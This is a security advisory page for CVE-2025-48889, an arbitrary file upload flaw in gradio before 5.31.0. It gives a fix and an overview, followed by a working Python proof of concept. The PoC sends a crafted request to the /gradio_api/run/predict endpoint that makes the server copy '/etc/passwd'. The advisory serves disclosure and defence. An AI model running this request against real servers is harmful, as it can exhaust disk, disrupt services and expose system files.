Arbitrary File Upload Affecting gradio package, versions [,5.31.0)


Severity

Recommended
0.0
medium
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.61% (45th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-GRADIO-10265012
  • published30 May 2025
  • disclosed29 May 2025
  • creditjjjutla, nkoorty

Introduced: 29 May 2025

CVE-2025-48889  (opens in a new tab)
CWE-434  (opens in a new tab)

How to fix?

Upgrade gradio to version 5.31.0 or higher.

Overview

gradio is a Python library for easily interacting with trained machine learning models

Affected versions of this package are vulnerable to Arbitrary File Upload through the shutil.copy operation in the FileData._copy_to_dir() method. An attacker can disrupt server operations by copying large or system-critical files to exhaust disk resources by sending specially crafted requests to the /gradio_api/run/predict endpoint.

PoC

import requests

url = "https://[your-gradio-app-url]/gradio_api/run/predict"  
headers = {
    "Content-Type": "application/json",  
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" 
}

payload = {
    "data": [
        {
            "path": "/etc/passwd",  
            "url": "[your-gradio-app-url]",
            "orig_name": "network_config", 
            "size": 5000,  
            "mime_type": "text/plain", 
            "meta": {
                "_type": "gradio.FileData"  
            }
        },
        {}  
    ],
    "event_data": None,
    "fn_index": 4, 
    "trigger_id": 11, 
    "session_hash": "test123"  
}

response = requests.post(url, headers=headers, json=payload)
print(f"Status Code: {response.status_code}")
print(f"Response Body: {response.text}")

CVSS Base Scores

version 4.0
version 3.1